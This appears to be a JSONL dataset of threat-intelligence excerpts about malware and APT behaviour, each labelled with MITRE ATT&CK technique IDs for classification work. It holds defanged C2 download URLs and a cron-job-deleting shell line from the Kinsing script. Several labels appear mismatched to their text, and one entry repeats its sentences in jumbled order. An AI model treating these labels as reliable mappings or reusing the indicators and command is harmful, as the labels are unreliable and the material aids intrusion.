{"text1":"A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails","labels":"['T1572']"}
{"text1":"The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack","labels":"['T1105']"}
{"text1":"The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications","labels":"['T1113']"}
{"text1":"5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '\/update.sh\/d' || crontab","labels":"['T1059.004', 'T1053.003']"}
{"text1":"Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex","labels":"['T1129']"}
{"text1":"The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10","labels":"['T1555.003']"}
{"text1":"Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization\u2019s email domain. If references are found, perform additional analysis to see if a data breach has occurred","labels":"['T1114.001']"}
{"text1":"Attack overview . Flagpro is used in the initial stage of attacks to investigate target\u2019s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as \u201cFlagpro v2.0\u201d and old one as \u201cFlagpro v1.0\u201d in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has \u201cExecYes\u201d, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection","labels":"['T1069.001']"}
{"text1":"Figure 5 Uploading a file to server via RGDoor\u00a0Downloading a file from the server via RGDoor","labels":"['T1105']"}
{"text1":"If the configuration is parsed successfully, the program writes the string \"Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is \u201cMeteor\u201c. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file","labels":"['T1105']"}
{"text1":"Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company\u2019s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers","labels":"['T1005']"}
{"text1":"Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits \u2014 given their capability to overwrite or modify parts of the kernel \u2014 makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up","labels":"['T1059.004']"}
{"text1":"During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. This modification to the system time was seen in the previous campaign, and the temporary license key within the wiper component is the exact same as wiper component from the 2012 attacks. The wiper itself queries the following registry keys to obtain a list of partitions to overwrite","labels":"['T1012']"}
{"text1":"Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block","labels":"['T1071.003']"}
{"text1":"If you use \/p, del displays the name of a file and sends the following message: FileName, Delete (Y\/N)? To confirm the deletion, press Y. To cancel the deletion and display the next file name (that is, if you specified a group of files), press N. For example, the following command deletes all of the files in the \\Work folder: Copy del \\work - You can use wildcards (* and ?) to delete more than one file at a time. However, to avoid deleting files unintentionally, you should use wildcards cautiously with the del command. For example, if you type the following command: Copy del *.* The del command displays the following prompt: Are you sure (Y\/N)? To delete all of the files in the current directory, press Y and then press ENTER. To cancel the deletion, press N and then press ENTER","labels":"['T1070.004']"}
{"text1":"To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor","labels":"['T1003.001']"}
{"text1":"Win32\/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares","labels":"['T1135']"}
{"text1":"In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program","labels":"['T1070.004']"}
{"text1":"HttpBrowser is a remote access tool whose name originates from the hard-coded \"HttpBrowser\/1.0\" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants","labels":"['T1083']"}
{"text1":"When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the \"packager trick\" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory","labels":"['T1204.002']"}
{"text1":"It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it","labels":"['T1059.005']"}
{"text1":"Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using\u00a0Set-CASMailbox","labels":"['T1098.005', 'T1098.002']"}
{"text1":"SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence","labels":"['T1566.001']"}
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists","labels":"['T1083']"}
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request","labels":"['T1070.004']"}
{"text1":"The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory","labels":"['T1547.001']"}
{"text1":"The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern","labels":"['T1020']"}
{"text1":"Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware","labels":"['T1057', 'T1543.003', 'T1119']"}
{"text1":"Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches","labels":"['T1204.002']"}
{"text1":"After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt","labels":"['T1047']"}
{"text1":"In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1059.001']"}
{"text1":"The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim\u2019s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5","labels":"['T1563.002']"}
{"text1":"The file \/tmp\/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry","labels":"['T1112']"}
{"text1":"This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files","labels":"['T1071.001']"}
{"text1":"The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name","labels":"['T1132.001']"}
{"text1":"The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named \u201cAnnual Bonus Report.doc\u201d. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet","labels":"['T1204.002', 'T1566.002']"}
{"text1":"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019","labels":"['T1137.006']"}
{"text1":"One of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of functions in charge of the malware\u2019s deployment on the victim machine","labels":"['T1518.001']"}
{"text1":"This behavior is detailed later in the blog under \"Malware Functionality\". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the \"Recovery of User Credentials\" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the \"Recovery of User Credentials\" section above","labels":"['T1003.001']"}
{"text1":"For persistence and remote control, the script downloads another base64-encoded Python script from hxxps:\/\/ptpb[.]pw\/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture","labels":"['T1059.006']"}
{"text1":"When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware","labels":"['T1123']"}
{"text1":"2022\u201301\u201315, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with \u201cWhisperGate\u201d overwrites Master Boot Record(MBR) and files","labels":"['T1561.002']"}
{"text1":"The AppleSeed payload has an export function named \u201cDllRegisterServer\u201d which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps","labels":"['T1059.007', 'T1059.001']"}
{"text1":"Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries","labels":"['T1598.003']"}
{"text1":"Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices","labels":"['T1021.002']"}
{"text1":"The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process","labels":"['T1055.001', 'T1057']"}
{"text1":"Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server","labels":"['T1105']"}
{"text1":"The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware","labels":"['T1105']"}
{"text1":"Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following","labels":"['T1071.004', 'T1008']"}
{"text1":"Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 \u2014 Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors","labels":"['T1059.001']"}
{"text1":"DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features","labels":"['T1518.001']"}
{"text1":"The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \u201c[username]=>singleton-instance-mutex\u201d. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string \u201cGlobal\\\\\u201d to create the mutex","labels":"['T1087.001', 'T1082']"}
{"text1":"Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto\u00a0researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT","labels":"['T1518.001']"}
{"text1":"As mentioned by the Cisco Talos Intelligence Group, after executing the Micropsia registers itself against the C2 server","labels":"['T1082']"}
{"text1":"The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration","labels":"['T1119']"}
{"text1":"At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the \/tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload","labels":"['T1222.002']"}
{"text1":"Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019","labels":"['T1204.002']"}
{"text1":"PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs","labels":"['T1555.004']"}
{"text1":"After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution","labels":"['T1059.003']"}
{"text1":"Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username","labels":"['T1047', 'T1082', 'T1016']"}
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack","labels":"['T1016']"}
{"text1":"One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1","labels":"['T1573', 'T1095']"}
{"text1":"The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document","labels":"['T1566.001']"}
{"text1":"The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access","labels":"['T1078', 'T1219']"}
{"text1":"A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task","labels":"['T1053.005']"}
{"text1":"The name EvilBunny is derived from debug information embedded in the malware\u2019s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\\Perf Manager\\ or %WINDIR%\\msapps\\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed \u2018hearer\u2019, which is believed to stand for \u2018listener\u2019. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants","labels":"['T1497.001']"}
{"text1":"The malware continues by creating a service named\u00a0mssecsvc2.0\u00a0with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service","labels":"['T1543.003']"}
{"text1":"Sends phishing mail to given recipients and receives user\u2019s access token using device code authentication flow","labels":"['T1528']"}
{"text1":"First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload","labels":"['T1053']"}
{"text1":"Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you\u2019ve copied) - Control your printer - Lock\/Restart\/Shutdown your computer - Update the implant with a new address to beacon to or new functionality","labels":"['T1082']"}
{"text1":"This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint","labels":"['T1547.001']"}
{"text1":"Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK","labels":"['T1071']"}
{"text1":"They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information","labels":"['T1083']"}
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1071.001']"}
{"text1":"The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named \u201cMy_files.zip\u201d to \u201cMy_files.zip.IAsnM\u201d, \u201cMy_files2.zip\u201d to \u201cMy_files2.zip.WZlF\u201d and so on. Also, the threat actor creates the \u201cRECOVER-FILES.txt\u201d with ransom note in all folders that contain encrypted files, as shown in the figure below","labels":"['T1486']"}
{"text1":"Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap","labels":"['T1106']"}
{"text1":"Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers","labels":"['T1016']"}
{"text1":"Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates","labels":"['T1587.003']"}
{"text1":"The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \\%TEMP%\\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group","labels":"['T1059.001']"}
{"text1":"The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings","labels":"['T1059.001', 'T1614.001']"}
{"text1":"Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file","labels":"['T1548.002']"}
{"text1":"For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee\u2019s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications","labels":"['T1036']"}
{"text1":"Additionally, each beacon is accompanied with a screenshot that is initially saved as \u2018scr.jpg\u2019 in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the \u2018uploadsf\u2019 command","labels":"['T1113']"}
{"text1":"The TajMahal framework is an intriguing discovery that\u2019s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc","labels":"['T1083', 'T1119', 'T1041']"}
{"text1":"Analysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings","labels":"['T1132.001']"}
{"text1":"This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group","labels":"['T1555.003']"}
